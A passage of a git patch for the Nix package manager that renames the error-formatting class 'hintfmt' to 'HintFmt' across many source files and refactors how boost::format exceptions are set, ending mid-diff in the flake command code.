src/libutil/error.cc | 4 +- src/libutil/error.hh | 20 +- src/libutil/fmt.hh | 67 +- src/libutil/serialise.cc | 4 +- src/nix/daemon.cc | 2 +- src/nix/eval.cc | 2 +- src/nix/flake.cc | 18 +- tests/unit/libexpr/error_traces.cc | 651 ++++++++++---------- tests/unit/libutil/logging.cc | 36 +- 29 files changed, 460 insertions(+), 464 deletions(-) diff --git a/src/build-remote/build-remote.cc b/src/build-remote/build-remote.cc index 94b672976..118468477 100644 --- a/src/build-remote/build-remote.cc +++ b/src/build-remote/build-remote.cc @@ -202,7 +202,7 @@ static int main_build_remote(int argc, char * * argv) else drvstr = ""; - auto error = hintfmt(errorText); + auto error = HintFmt(errorText); error % drvstr % neededSystem diff --git a/src/libexpr/eval-error.cc b/src/libexpr/eval-error.cc index 250c59a19..f4cdeec5c 100644 --- a/src/libexpr/eval-error.cc +++ b/src/libexpr/eval-error.cc @@ -28,7 +28,7 @@ template EvalErrorBuilder & EvalErrorBuilder::withTrace(PosIdx pos, const std::string_view text) { error.err.traces.push_front( - Trace{.pos = error.state.positions[pos], .hint = hintfmt(std::string(text)), .frame = false}); + Trace{.pos = error.state.positions[pos], .hint = HintFmt(std::string(text)), .frame = false}); return *this; } @@ -36,7 +36,7 @@ template EvalErrorBuilder & EvalErrorBuilder::withFrameTrace(PosIdx pos, const std::string_view text) { error.err.traces.push_front( - Trace{.pos = error.state.positions[pos], .hint = hintformat(std::string(text)), .frame = true}); + Trace{.pos = error.state.positions[pos], .hint = HintFmt(std::string(text)), .frame = true}); return *this; } @@ -57,13 +57,13 @@ EvalErrorBuilder & EvalErrorBuilder::withFrame(const Env & env, const Expr .pos = error.state.positions[expr.getPos()], .expr = expr, .env = env, - .hint = hintformat("Fake frame for debugging purposes"), + .hint = HintFmt("Fake frame for debugging purposes"), .isError = true}); return *this; } template -EvalErrorBuilder & EvalErrorBuilder::addTrace(PosIdx pos, 
hintformat hint, bool frame) +EvalErrorBuilder & EvalErrorBuilder::addTrace(PosIdx pos, HintFmt hint, bool frame) { error.addTrace(error.state.positions[pos], hint, frame); return *this; @@ -75,7 +75,7 @@ EvalErrorBuilder & EvalErrorBuilder::addTrace(PosIdx pos, std::string_view formatString, const Args &... formatArgs) { - addTrace(error.state.positions[pos], hintfmt(std::string(formatString), formatArgs...)); + addTrace(error.state.positions[pos], HintFmt(std::string(formatString), formatArgs...)); return *this; } diff --git a/src/libexpr/eval-error.hh b/src/libexpr/eval-error.hh index 711743886..392902ad2 100644 --- a/src/libexpr/eval-error.hh +++ b/src/libexpr/eval-error.hh @@ -89,7 +89,7 @@ public: [[nodiscard, gnu::noinline]] EvalErrorBuilder & withFrame(const Env & e, const Expr & ex); - [[nodiscard, gnu::noinline]] EvalErrorBuilder & addTrace(PosIdx pos, hintformat hint, bool frame = false); + [[nodiscard, gnu::noinline]] EvalErrorBuilder & addTrace(PosIdx pos, HintFmt hint, bool frame = false); template [[nodiscard, gnu::noinline]] EvalErrorBuilder & diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 5bc62589c..bffbd5f1a 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -803,7 +803,7 @@ void EvalState::addErrorTrace(Error & e, const char * s, const std::string & s2) void EvalState::addErrorTrace(Error & e, const PosIdx pos, const char * s, const std::string & s2, bool frame) const { - e.addTrace(positions[pos], hintfmt(s, s2), frame); + e.addTrace(positions[pos], HintFmt(s, s2), frame); } template @@ -819,7 +819,7 @@ static std::unique_ptr makeDebugTraceStacker( .pos = std::move(pos), .expr = expr, .env = env, - .hint = hintfmt(formatArgs...), + .hint = HintFmt(formatArgs...), .isError = false }); } @@ -2792,7 +2792,7 @@ std::optional EvalState::resolveSearchPathPath(const SearchPath::Pa res = { store->toRealPath(storePath) }; } catch (FileTransferError & e) { logWarning({ - .msg = hintfmt("Nix search path entry '%1%' cannot be 
downloaded, ignoring", value) + .msg = HintFmt("Nix search path entry '%1%' cannot be downloaded, ignoring", value) }); } } @@ -2825,7 +2825,7 @@ std::optional EvalState::resolveSearchPathPath(const SearchPath::Pa res = { path }; else { logWarning({ - .msg = hintfmt("Nix search path entry '%1%' does not exist, ignoring", value) + .msg = HintFmt("Nix search path entry '%1%' does not exist, ignoring", value) }); res = std::nullopt; } diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh index f72135527..756ab98e3 100644 --- a/src/libexpr/eval.hh +++ b/src/libexpr/eval.hh @@ -148,7 +148,7 @@ struct DebugTrace { std::shared_ptr pos; const Expr & expr; const Env & env; - hintfmt hint; + HintFmt hint; bool isError; }; diff --git a/src/libexpr/flake/flake.cc b/src/libexpr/flake/flake.cc index 3396b0219..451780c89 100644 --- a/src/libexpr/flake/flake.cc +++ b/src/libexpr/flake/flake.cc @@ -155,7 +155,7 @@ static FlakeInput parseFlakeInput(EvalState & state, } catch (Error & e) { e.addTrace( state.positions[attr.pos], - hintfmt("while evaluating flake attribute '%s'", state.symbols[attr.name])); + HintFmt("while evaluating flake attribute '%s'", state.symbols[attr.name])); throw; } } @@ -164,7 +164,7 @@ static FlakeInput parseFlakeInput(EvalState & state, try { input.ref = FlakeRef::fromAttrs(attrs); } catch (Error & e) { - e.addTrace(state.positions[pos], hintfmt("while evaluating flake input")); + e.addTrace(state.positions[pos], HintFmt("while evaluating flake input")); throw; } else { diff --git a/src/libexpr/lexer.l b/src/libexpr/lexer.l index af67e847d..380048c77 100644 --- a/src/libexpr/lexer.l +++ b/src/libexpr/lexer.l @@ -147,7 +147,7 @@ or { return OR_KW; } yylval->n = boost::lexical_cast(yytext); } catch (const boost::bad_lexical_cast &) { throw ParseError(ErrorInfo{ - .msg = hintfmt("invalid integer '%1%'", yytext), + .msg = HintFmt("invalid integer '%1%'", yytext), .pos = state->positions[CUR_POS], }); } @@ -157,7 +157,7 @@ or { return OR_KW; } yylval->nf = 
strtod(yytext, 0); if (errno != 0) throw ParseError(ErrorInfo{ - .msg = hintfmt("invalid float '%1%'", yytext), + .msg = HintFmt("invalid float '%1%'", yytext), .pos = state->positions[CUR_POS], }); return FLOAT_LIT; @@ -286,7 +286,7 @@ or { return OR_KW; } {ANY} | <> { throw ParseError(ErrorInfo{ - .msg = hintfmt("path has a trailing slash"), + .msg = HintFmt("path has a trailing slash"), .pos = state->positions[CUR_POS], }); } diff --git a/src/libexpr/parser-state.hh b/src/libexpr/parser-state.hh index bdd5bbabe..87aeaeef5 100644 --- a/src/libexpr/parser-state.hh +++ b/src/libexpr/parser-state.hh @@ -64,7 +64,7 @@ struct ParserState inline void ParserState::dupAttr(const AttrPath & attrPath, const PosIdx pos, const PosIdx prevPos) { throw ParseError({ - .msg = hintfmt("attribute '%1%' already defined at %2%", + .msg = HintFmt("attribute '%1%' already defined at %2%", showAttrPath(symbols, attrPath), positions[prevPos]), .pos = positions[pos] }); @@ -73,7 +73,7 @@ inline void ParserState::dupAttr(const AttrPath & attrPath, const PosIdx pos, co inline void ParserState::dupAttr(Symbol attr, const PosIdx pos, const PosIdx prevPos) { throw ParseError({ - .msg = hintfmt("attribute '%1%' already defined at %2%", symbols[attr], positions[prevPos]), + .msg = HintFmt("attribute '%1%' already defined at %2%", symbols[attr], positions[prevPos]), .pos = positions[pos] }); } @@ -154,13 +154,13 @@ inline Formals * ParserState::validateFormals(Formals * formals, PosIdx pos, Sym } if (duplicate) throw ParseError({ - .msg = hintfmt("duplicate formal function argument '%1%'", symbols[duplicate->first]), + .msg = HintFmt("duplicate formal function argument '%1%'", symbols[duplicate->first]), .pos = positions[duplicate->second] }); if (arg && formals->has(arg)) throw ParseError({ - .msg = hintfmt("duplicate formal function argument '%1%'", symbols[arg]), + .msg = HintFmt("duplicate formal function argument '%1%'", symbols[arg]), .pos = positions[pos] }); diff --git 
a/src/libexpr/parser.y b/src/libexpr/parser.y index 95f45c80a..a3ba13c66 100644 --- a/src/libexpr/parser.y +++ b/src/libexpr/parser.y @@ -65,7 +65,7 @@ using namespace nix; void yyerror(YYLTYPE * loc, yyscan_t scanner, ParserState * state, const char * error) { throw ParseError({ - .msg = hintfmt(error), + .msg = HintFmt(error), .pos = state->positions[state->at(*loc)] }); } @@ -154,7 +154,7 @@ expr_function | LET binds IN_KW expr_function { if (!$2->dynamicAttrs.empty()) throw ParseError({ - .msg = hintfmt("dynamic attributes not allowed in let"), + .msg = HintFmt("dynamic attributes not allowed in let"), .pos = state->positions[CUR_POS] }); $$ = new ExprLet($2, $4); @@ -244,7 +244,7 @@ expr_simple static bool noURLLiterals = experimentalFeatureSettings.isEnabled(Xp::NoUrlLiterals); if (noURLLiterals) throw ParseError({ - .msg = hintfmt("URL literals are disabled"), + .msg = HintFmt("URL literals are disabled"), .pos = state->positions[CUR_POS] }); $$ = new ExprString(std::string($1)); @@ -340,7 +340,7 @@ attrs delete str; } else throw ParseError({ - .msg = hintfmt("dynamic attributes not allowed in inherit"), + .msg = HintFmt("dynamic attributes not allowed in inherit"), .pos = state->positions[state->at(@2)] }); } diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index 5e2bbe16f..8c6aeffac 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -754,7 +754,7 @@ static RegisterPrimOp primop_break({ if (state.debugRepl && !state.debugTraces.empty()) { auto error = Error(ErrorInfo { .level = lvlInfo, - .msg = hintfmt("breakpoint reached"), + .msg = HintFmt("breakpoint reached"), .pos = state.positions[pos], }); @@ -765,7 +765,7 @@ static RegisterPrimOp primop_break({ // If the user elects to quit the repl, throw an exception. 
throw Error(ErrorInfo{ .level = lvlInfo, - .msg = hintfmt("quit the debugger"), + .msg = HintFmt("quit the debugger"), .pos = nullptr, }); } @@ -820,7 +820,7 @@ static void prim_addErrorContext(EvalState & state, const PosIdx pos, Value * * auto message = state.coerceToString(pos, *args[0], context, "while evaluating the error message passed to builtins.addErrorContext", false, false).toOwned(); - e.addTrace(nullptr, hintfmt(message), true); + e.addTrace(nullptr, HintFmt(message), true); throw; } } @@ -1071,7 +1071,7 @@ static void prim_derivationStrict(EvalState & state, const PosIdx pos, Value * * * often results from the composition of several functions * (derivationStrict, derivation, mkDerivation, mkPythonModule, etc.) */ - e.addTrace(nullptr, hintfmt( + e.addTrace(nullptr, HintFmt( "while evaluating derivation '%s'\n" " whose name attribute is located at %s", drvName, pos), true); @@ -1232,7 +1232,7 @@ drvName, Bindings * attrs, Value & v) } catch (Error & e) { e.addTrace(state.positions[i->pos], - hintfmt("while evaluating attribute '%1%' of derivation '%2%'", key, drvName), + HintFmt("while evaluating attribute '%1%' of derivation '%2%'", key, drvName), true); throw; } diff --git a/src/libexpr/primops/fetchClosure.cc b/src/libexpr/primops/fetchClosure.cc index 5806b3ff9..f51a6465d 100644 --- a/src/libexpr/primops/fetchClosure.cc +++ b/src/libexpr/primops/fetchClosure.cc @@ -23,7 +23,7 @@ static void runFetchClosureWithRewrite(EvalState & state, const PosIdx pos, Stor auto rewrittenPath = makeContentAddressed(fromStore, *state.store, fromPath); if (toPathMaybe && *toPathMaybe != rewrittenPath) throw Error({ - .msg = hintfmt("rewriting '%s' to content-addressed form yielded '%s', while '%s' was expected", + .msg = HintFmt("rewriting '%s' to content-addressed form yielded '%s', while '%s' was expected", state.store->printStorePath(fromPath), state.store->printStorePath(rewrittenPath), state.store->printStorePath(*toPathMaybe)), @@ -31,7 +31,7 @@ static void 
runFetchClosureWithRewrite(EvalState & state, const PosIdx pos, Stor }); if (!toPathMaybe) throw Error({ - .msg = hintfmt( + .msg = HintFmt( "rewriting '%s' to content-addressed form yielded '%s'\n" "Use this value for the 'toPath' attribute passed to 'fetchClosure'", state.store->printStorePath(fromPath), @@ -50,7 +50,7 @@ static void runFetchClosureWithRewrite(EvalState & state, const PosIdx pos, Stor // We don't perform the rewriting when outPath already exists, as an optimisation. // However, we can quickly detect a mistake if the toPath is input addressed. throw Error({ - .msg = hintfmt( + .msg = HintFmt( "The 'toPath' value '%s' is input-addressed, so it can't possibly be the result of rewriting to a content-addressed path.\n\n" "Set 'toPath' to an empty string to make Nix report the correct content-addressed path.", state.store->printStorePath(toPath)), @@ -73,7 +73,7 @@ static void runFetchClosureWithContentAddressedPath(EvalState & state, const Pos if (!info->isContentAddressed(*state.store)) { throw Error({ - .msg = hintfmt( + .msg = HintFmt( "The 'fromPath' value '%s' is input-addressed, but 'inputAddressed' is set to 'false' (default).\n\n" "If you do intend to fetch an input-addressed store path, add\n\n" " inputAddressed = true;\n\n" @@ -99,7 +99,7 @@ static void runFetchClosureWithInputAddressedPath(EvalState & state, const PosId if (info->isContentAddressed(*state.store)) { throw Error({ - .msg = hintfmt( + .msg = HintFmt( "The store object referred to by 'fromPath' at '%s' is not input-addressed, but 'inputAddressed' is set to 'true'.\n\n" "Remove the 'inputAddressed' attribute (it defaults to 'false') to expect 'fromPath' to be content-addressed", state.store->printStorePath(fromPath)), @@ -153,14 +153,14 @@ static void prim_fetchClosure(EvalState & state, const PosIdx pos, Value * * arg else throw Error({ - .msg = hintfmt("attribute '%s' isn't supported in call to 'fetchClosure'", attrName), + .msg = HintFmt("attribute '%s' isn't supported in 
call to 'fetchClosure'", attrName), .pos = state.positions[pos] }); } if (!fromPath) throw Error({ - .msg = hintfmt("attribute '%s' is missing in call to 'fetchClosure'", "fromPath"), + .msg = HintFmt("attribute '%s' is missing in call to 'fetchClosure'", "fromPath"), .pos = state.positions[pos] }); @@ -169,7 +169,7 @@ static void prim_fetchClosure(EvalState & state, const PosIdx pos, Value * * arg if (inputAddressed) { if (toPath) throw Error({ - .msg = hintfmt("attribute '%s' is set to true, but '%s' is also set. Please remove one of them", + .msg = HintFmt("attribute '%s' is set to true, but '%s' is also set. Please remove one of them", "inputAddressed", "toPath"), .pos = state.positions[pos] @@ -178,7 +178,7 @@ static void prim_fetchClosure(EvalState & state, const PosIdx pos, Value * * arg if (!fromStoreUrl) throw Error({ - .msg = hintfmt("attribute '%s' is missing in call to 'fetchClosure'", "fromStore"), + .msg = HintFmt("attribute '%s' is missing in call to 'fetchClosure'", "fromStore"), .pos = state.positions[pos] }); @@ -188,13 +188,13 @@ static void prim_fetchClosure(EvalState & state, const PosIdx pos, Value * * arg parsedURL.scheme != "https" && !(getEnv("_NIX_IN_TEST").has_value() && parsedURL.scheme == "file")) throw Error({ - .msg = hintfmt("'fetchClosure' only supports http:// and https:// stores"), + .msg = HintFmt("'fetchClosure' only supports http:// and https:// stores"), .pos = state.positions[pos] }); if (!parsedURL.query.empty()) throw Error({ - .msg = hintfmt("'fetchClosure' does not support URL query parameters (in '%s')", *fromStoreUrl), + .msg = HintFmt("'fetchClosure' does not support URL query parameters (in '%s')", *fromStoreUrl), .pos = state.positions[pos] }); diff --git a/src/libexpr/print.cc b/src/libexpr/print.cc index 9f31f3340..7e90e47eb 100644 --- a/src/libexpr/print.cc +++ b/src/libexpr/print.cc @@ -512,7 +512,7 @@ std::ostream & operator<<(std::ostream & output, const ValuePrinter & printer) } template<> -hintformat & 
hintformat::operator%(const ValuePrinter & value) +HintFmt & HintFmt::operator%(const ValuePrinter & value) { fmt % value; return *this; diff --git a/src/libexpr/print.hh b/src/libexpr/print.hh index a542bc7b1..7ddda81b8 100644 --- a/src/libexpr/print.hh +++ b/src/libexpr/print.hh @@ -86,6 +86,6 @@ std::ostream & operator<<(std::ostream & output, const ValuePrinter & printer); * magenta. */ template<> -hintformat & hintformat::operator%(const ValuePrinter & value); +HintFmt & HintFmt::operator%(const ValuePrinter & value); } diff --git a/src/libexpr/value-to-json.cc b/src/libexpr/value-to-json.cc index b2f116390..3f877a7fd 100644 --- a/src/libexpr/value-to-json.cc +++ b/src/libexpr/value-to-json.cc @@ -64,7 +64,7 @@ json printValueAsJSON(EvalState & state, bool strict, out[j] = printValueAsJSON(state, strict, *a.value, a.pos, context, copyToStore); } catch (Error & e) { e.addTrace(state.positions[a.pos], - hintfmt("while evaluating attribute '%1%'", j)); + HintFmt("while evaluating attribute '%1%'", j)); throw; } } @@ -81,7 +81,7 @@ json printValueAsJSON(EvalState & state, bool strict, out.push_back(printValueAsJSON(state, strict, *elem, pos, context, copyToStore)); } catch (Error & e) { e.addTrace(state.positions[pos], - hintfmt("while evaluating list element at index %1%", i)); + HintFmt("while evaluating list element at index %1%", i)); throw; } i++; diff --git a/src/libexpr/value/context.hh b/src/libexpr/value/context.hh index 2abd1c9d4..7f23cd3a4 100644 --- a/src/libexpr/value/context.hh +++ b/src/libexpr/value/context.hh @@ -19,8 +19,8 @@ public: : Error("") { raw = raw_; - auto hf = hintfmt(args...); - err.msg = hintfmt("Bad String Context element: %1%: %2%", Uncolored(hf.str()), raw); + auto hf = HintFmt(args...); + err.msg = HintFmt("Bad String Context element: %1%: %2%", Uncolored(hf.str()), raw); } }; diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc index a2f411b8a..2f60d2f38 100644 --- 
a/src/libstore/build/local-derivation-goal.cc +++ b/src/libstore/build/local-derivation-goal.cc @@ -92,7 +92,7 @@ void handleDiffHook( } catch (Error & error) { ErrorInfo ei = error.info(); // FIXME: wrap errors. - ei.msg = hintfmt("diff hook execution failed: %s", ei.msg.str()); + ei.msg = HintFmt("diff hook execution failed: %s", ei.msg.str()); logError(ei); } } diff --git a/src/libstore/filetransfer.cc b/src/libstore/filetransfer.cc index eb39be158..ebfae346f 100644 --- a/src/libstore/filetransfer.cc +++ b/src/libstore/filetransfer.cc @@ -882,12 +882,12 @@ template FileTransferError::FileTransferError(FileTransfer::Error error, std::optional response, const Args & ... args) : Error(args...), error(error), response(response) { - const auto hf = hintfmt(args...); + const auto hf = HintFmt(args...); // FIXME: Due to https://github.com/NixOS/nix/issues/3841 we don't know how // to print different messages for different verbosity levels. For now // we add some heuristics for detecting when we want to show the response. if (response && (response->size() < 1024 || response->find("") != std::string::npos)) - err.msg = hintfmt("%1%\n\nresponse body:\n\n%2%", Uncolored(hf.str()), chomp(*response)); + err.msg = HintFmt("%1%\n\nresponse body:\n\n%2%", Uncolored(hf.str()), chomp(*response)); else err.msg = hf; } diff --git a/src/libstore/sqlite.cc b/src/libstore/sqlite.cc index ff14ec420..06abfb90b 100644 --- a/src/libstore/sqlite.cc +++ b/src/libstore/sqlite.cc @@ -10,11 +10,11 @@ namespace nix { -SQLiteError::SQLiteError(const char *path, const char *errMsg, int errNo, int extendedErrNo, int offset, hintfmt && hf) +SQLiteError::SQLiteError(const char *path, const char *errMsg, int errNo, int extendedErrNo, int offset, HintFmt && hf) : Error(""), path(path), errMsg(errMsg), errNo(errNo), extendedErrNo(extendedErrNo), offset(offset) { auto offsetStr = (offset == -1) ? 
"" : "at offset " + std::to_string(offset) + ": "; - err.msg = hintfmt("%s: %s%s, %s (in '%s')", + err.msg = HintFmt("%s: %s%s, %s (in '%s')", Uncolored(hf.str()), offsetStr, sqlite3_errstr(extendedErrNo), @@ -22,7 +22,7 @@ SQLiteError::SQLiteError(const char *path, const char *errMsg, int errNo, int ex path ? path : "(in-memory)"); } -[[noreturn]] void SQLiteError::throw_(sqlite3 * db, hintfmt && hf) +[[noreturn]] void SQLiteError::throw_(sqlite3 * db, HintFmt && hf) { int err = sqlite3_errcode(db); int exterr = sqlite3_extended_errcode(db); @@ -33,7 +33,7 @@ SQLiteError::SQLiteError(const char *path, const char *errMsg, int errNo, int ex if (err == SQLITE_BUSY || err == SQLITE_PROTOCOL) { auto exp = SQLiteBusy(path, errMsg, err, exterr, offset, std::move(hf)); - exp.err.msg = hintfmt( + exp.err.msg = HintFmt( err == SQLITE_PROTOCOL ? "SQLite database '%s' is busy (SQLITE_PROTOCOL)" : "SQLite database '%s' is busy", @@ -249,7 +249,7 @@ void handleSQLiteBusy(const SQLiteBusy & e, time_t & nextWarning) if (now > nextWarning) { nextWarning = now + 10; logWarning({ - .msg = hintfmt(e.what()) + .msg = HintFmt(e.what()) }); } diff --git a/src/libstore/sqlite.hh b/src/libstore/sqlite.hh index 33ebb5892..003e4d101 100644 --- a/src/libstore/sqlite.hh +++ b/src/libstore/sqlite.hh @@ -142,19 +142,19 @@ struct SQLiteError : Error template [[noreturn]] static void throw_(sqlite3 * db, const std::string & fs, const Args & ... args) { - throw_(db, hintfmt(fs, args...)); + throw_(db, HintFmt(fs, args...)); } - SQLiteError(const char *path, const char *errMsg, int errNo, int extendedErrNo, int offset, hintfmt && hf); + SQLiteError(const char *path, const char *errMsg, int errNo, int extendedErrNo, int offset, HintFmt && hf); protected: template SQLiteError(const char *path, const char *errMsg, int errNo, int extendedErrNo, int offset, const std::string & fs, const Args & ... 
args) - : SQLiteError(path, errMsg, errNo, extendedErrNo, offset, hintfmt(fs, args...)) + : SQLiteError(path, errMsg, errNo, extendedErrNo, offset, HintFmt(fs, args...)) { } - [[noreturn]] static void throw_(sqlite3 * db, hintfmt && hf); + [[noreturn]] static void throw_(sqlite3 * db, HintFmt && hf); }; diff --git a/src/libutil/current-process.cc b/src/libutil/current-process.cc index 01f64f211..47aa137d8 100644 --- a/src/libutil/current-process.cc +++ b/src/libutil/current-process.cc @@ -63,7 +63,7 @@ void setStackSize(rlim_t stackSize) if (setrlimit(RLIMIT_STACK, &limit) != 0) { logger->log( lvlError, - hintfmt( + HintFmt( "Failed to increase stack size from %1% to %2% (maximum allowed stack size: %3%): %4%", savedStackSize, stackSize, diff --git a/src/libutil/error.cc b/src/libutil/error.cc index e3b30b3a1..4a9efc0b5 100644 --- a/src/libutil/error.cc +++ b/src/libutil/error.cc @@ -11,7 +11,7 @@ namespace nix { -void BaseError::addTrace(std::shared_ptr && e, hintfmt hint, bool frame) +void BaseError::addTrace(std::shared_ptr && e, HintFmt hint, bool frame) { err.traces.push_front(Trace { .pos = std::move(e), .hint = hint, .frame = frame }); } @@ -37,7 +37,7 @@ const std::string & BaseError::calcWhat() const std::optional ErrorInfo::programName = std::nullopt; -std::ostream & operator <<(std::ostream & os, const hintfmt & hf) +std::ostream & operator <<(std::ostream & os, const HintFmt & hf) { return os << hf.str(); } diff --git a/src/libutil/error.hh b/src/libutil/error.hh index 966f4d770..2e5de5d32 100644 --- a/src/libutil/error.hh +++ b/src/libutil/error.hh @@ -63,7 +63,7 @@ void printCodeLines(std::ostream & out, struct Trace { std::shared_ptr pos; - hintfmt hint; + HintFmt hint; bool frame; }; @@ -74,7 +74,7 @@ inline bool operator>=(const Trace& lhs, const Trace& rhs); struct ErrorInfo { Verbosity level; - hintfmt msg; + HintFmt msg; std::shared_ptr pos; std::list traces; @@ -113,20 +113,20 @@ public: template BaseError(unsigned int status, const Args & ... 
args) - : err { .level = lvlError, .msg = hintfmt(args...), .status = status } + : err { .level = lvlError, .msg = HintFmt(args...), .status = status } { } template explicit BaseError(const std::string & fs, const Args & ... args) - : err { .level = lvlError, .msg = hintfmt(fs, args...) } + : err { .level = lvlError, .msg = HintFmt(fs, args...) } { } template BaseError(const Suggestions & sug, const Args & ... args) - : err { .level = lvlError, .msg = hintfmt(args...), .suggestions = sug } + : err { .level = lvlError, .msg = HintFmt(args...), .suggestions = sug } { } - BaseError(hintfmt hint) + BaseError(HintFmt hint) : err { .level = lvlError, .msg = hint } { } @@ -159,10 +159,10 @@ public: template void addTrace(std::shared_ptr && e, std::string_view fs, const Args & ... args) { - addTrace(std::move(e), hintfmt(std::string(fs), args...)); + addTrace(std::move(e), HintFmt(std::string(fs), args...)); } - void addTrace(std::shared_ptr && e, hintfmt hint, bool frame = false); + void addTrace(std::shared_ptr && e, HintFmt hint, bool frame = false); bool hasTrace() const { return !err.traces.empty(); } @@ -214,8 +214,8 @@ public: SysError(int errNo, const Args & ... args) : SystemError(""), errNo(errNo) { - auto hf = hintfmt(args...); - err.msg = hintfmt("%1%: %2%", Uncolored(hf.str()), strerror(errNo)); + auto hf = HintFmt(args...); + err.msg = HintFmt("%1%: %2%", Uncolored(hf.str()), strerror(errNo)); } /** diff --git a/src/libutil/fmt.hh b/src/libutil/fmt.hh index 9c2cc1e85..e996f4ba2 100644 --- a/src/libutil/fmt.hh +++ b/src/libutil/fmt.hh @@ -31,6 +31,17 @@ inline void formatHelper(F & f, const T & x, const Args & ... args) // Interpolate one argument and then recurse. formatHelper(f % x, args...); } + +/** + * Set the correct exceptions for `fmt`. 
+ */ +void setExceptions(boost::format & fmt) +{ + fmt.exceptions( + boost::io::all_error_bits ^ + boost::io::too_many_args_bit ^ + boost::io::too_few_args_bit); +} } /** @@ -74,7 +85,7 @@ template inline std::string fmt(const std::string & fs, const Args & ... args) { boost::format f(fs); - f.exceptions(boost::io::all_error_bits ^ boost::io::too_many_args_bit); + setExceptions(f); formatHelper(f, args...); return f.str(); } @@ -82,9 +93,9 @@ inline std::string fmt(const std::string & fs, const Args & ... args) /** * Values wrapped in this struct are printed in magenta. * - * By default, arguments to `hintfmt` are printed in magenta. To avoid this, + * By default, arguments to `HintFmt` are printed in magenta. To avoid this, * either wrap the argument in `Uncolored` or add a specialization of - * `hintfmt::operator%`. + * `HintFmt::operator%`. */ template struct Magenta @@ -102,7 +113,7 @@ std::ostream & operator<<(std::ostream & out, const Magenta & y) /** * Values wrapped in this class are printed without coloring. * - * By default, arguments to `hintfmt` are printed in magenta (see `Magenta`). + * By default, arguments to `HintFmt` are printed in magenta (see `Magenta`). */ template struct Uncolored @@ -121,65 +132,49 @@ std::ostream & operator<<(std::ostream & out, const Uncolored & y) * A wrapper around `boost::format` which colors interpolated arguments in * magenta by default. */ -class hintfmt +class HintFmt { private: boost::format fmt; public: - /** - * Construct a `hintfmt` from a format string, with values to be - * interpolated later with `%`. - * - * This isn't exposed as a single-argument constructor to avoid - * accidentally constructing `hintfmt`s with user-controlled strings. See - * the note on `fmt` for more information. 
- */ - static hintfmt interpolate(const std::string & formatString) - { - hintfmt result((boost::format(formatString))); - result.fmt.exceptions( - boost::io::all_error_bits ^ - boost::io::too_many_args_bit ^ - boost::io::too_few_args_bit); - return result; - } - /** * Format the given string literally, without interpolating format * placeholders. */ - hintfmt(const std::string & literal) - : hintfmt("%s", Uncolored(literal)) + HintFmt(const std::string & literal) + : HintFmt("%s", Uncolored(literal)) { } /** * Interpolate the given arguments into the format string. */ template - hintfmt(const std::string & format, const Args & ... args) - : fmt(format) - { - formatHelper(*this, args...); - } + HintFmt(const std::string & format, const Args & ... args) + : HintFmt(boost::format(format), args...) + { } - hintfmt(const hintfmt & hf) + HintFmt(const HintFmt & hf) : fmt(hf.fmt) { } - hintfmt(boost::format && fmt) + template + HintFmt(boost::format && fmt, const Args & ... args) : fmt(std::move(fmt)) - { } + { + setExceptions(fmt); + formatHelper(*this, args...); + } template - hintfmt & operator%(const T & value) + HintFmt & operator%(const T & value) { fmt % Magenta(value); return *this; } template - hintfmt & operator%(const Uncolored & value) + HintFmt & operator%(const Uncolored & value) { fmt % value.value; return *this; @@ -191,6 +186,6 @@ public: } }; -std::ostream & operator<<(std::ostream & os, const hintfmt & hf); +std::ostream & operator<<(std::ostream & os, const HintFmt & hf); } diff --git a/src/libutil/serialise.cc b/src/libutil/serialise.cc index 7fc211491..70c16ff0d 100644 --- a/src/libutil/serialise.cc +++ b/src/libutil/serialise.cc @@ -448,7 +448,7 @@ Error readError(Source & source) auto msg = readString(source); ErrorInfo info { .level = level, - .msg = hintfmt(msg), + .msg = HintFmt(msg), }; auto havePos = readNum(source); assert(havePos == 0); @@ -457,7 +457,7 @@ Error readError(Source & source) havePos = readNum(source); assert(havePos == 0); 
info.traces.push_back(Trace { - .hint = hintfmt(readString(source)) + .hint = HintFmt(readString(source)) }); } return Error(std::move(info)); diff --git a/src/nix/daemon.cc b/src/nix/daemon.cc index 4dada8e0e..8afcbe982 100644 --- a/src/nix/daemon.cc +++ b/src/nix/daemon.cc @@ -377,7 +377,7 @@ static void daemonLoop(std::optional forceTrustClientOpt) } catch (Error & error) { auto ei = error.info(); // FIXME: add to trace? - ei.msg = hintfmt("error processing connection: %1%", ei.msg.str()); + ei.msg = HintFmt("error processing connection: %1%", ei.msg.str()); logError(ei); } } diff --git a/src/nix/eval.cc b/src/nix/eval.cc index 2e0837c8e..e6a022e5f 100644 --- a/src/nix/eval.cc +++ b/src/nix/eval.cc @@ -98,7 +98,7 @@ struct CmdEval : MixJSON, InstallableValueCommand, MixReadOnlyOption } catch (Error & e) { e.addTrace( state->positions[attr.pos], - hintfmt("while evaluating the attribute '%s'", name)); + HintFmt("while evaluating the attribute '%s'", name)); throw; } } diff --git a/src/nix/flake.cc b/src/nix/flake.cc index 646e4c831..4504bb22e 100644 --- a/src/nix/flake.cc +++ b/src/nix/flake.cc @@ -411,7 +411,7 @@ struct CmdFlakeCheck : FlakeCommand return storePath; } } catch (Error & e) { - e.addTrace(resolve(pos), hintfmt("while checking the derivation '%s'", attrPath)); + e.addTrace(resolve(pos), HintFmt("while checking the derivation '%s'", attrPath)); reportError(e); } return std::nullopt; @@ -430,7 +430,7 @@ struct CmdFlakeCheck : FlakeCommand } #endif } catch (Error & e) { - e.addTrace(resolve(pos), hintfmt("while checking the app definition '%s'", attrPath)); + e.addTrace(resolve(pos), HintFmt("while checking the app definition '%s'", attrPath)); reportError(e); } }; @@ -454,7 +454,7 @@ struct CmdFlakeCheck : FlakeCommand // FIXME: if we have a 'nixpkgs' input, use it to // evaluate the overlay. 
